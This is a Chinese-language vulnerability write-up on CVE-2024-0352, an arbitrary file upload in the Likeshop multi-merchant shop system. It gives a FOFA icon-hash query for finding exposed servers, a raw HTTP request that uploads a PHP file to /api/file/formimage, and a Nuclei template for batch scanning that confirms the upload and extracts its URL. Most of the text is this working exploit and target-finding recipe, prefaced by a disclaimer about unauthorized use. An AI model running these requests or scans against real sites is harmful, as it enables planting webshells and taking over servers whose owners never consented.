免责声明:
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
一:漏洞描述
Likeshop是一个100%开源免费的B2B2C多商户商城系统,支持官方旗舰店,商家入驻,平台抽佣+商家独立结算,统一下单+订单拆分等功能。该产品存在任意文件上传,攻击者可通过此漏洞上传木马获取服务器权限。
二:漏洞影响版本
version<= 2.5.7.20210311
三:网络空间测绘查询
fofa
icon_hash="874152924"
四:漏洞复现
POC:
POST /api/file/formimage HTTP/2
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip, deflate
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="test.php"
Content-Type: application/x-php
This page has a vulnerability!
------WebKitFormBoundarygcflwtei--
批量检测
id: CVE-2024-0352
info:
name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
author: CookieHanHoan,babybash,samuelsamuelsamuel
severity: high
description: |
A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
impact: |
The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
remediation: Update to the latest version
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-0352
- https://note.zhaoj.in/share/ciwYj7QXC4sZ
- https://vuldb.com/?ctiid.250120
- https://vuldb.com/?id.250120
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2024-0352
cwe-id: CWE-434
metadata:
verified: true
max-request: 1
vendor: likeshop
shodan-query: http.favicon.hash:874152924
tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /api/file/formimage HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="{{filename}}.php"
Content-Type: application/x-php
{{randstr}}
------WebKitFormBoundarygcflwtei--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"name\":\"{{filename}}.php\"")'
- 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
condition: and
extractors:
- type: json
part: body
json:
- ".data.url"
# digest: 4a0a00473045022100deb88d0d5f3f0af25df24379957bd65e84c9ce39a4d8c4aa791388f67b61c25002207f6c80534d7839ef8754e96b5ea1c543908e9c77315afcb83a24e6022d227026:922c64590222798bb761d5b6d8e72950
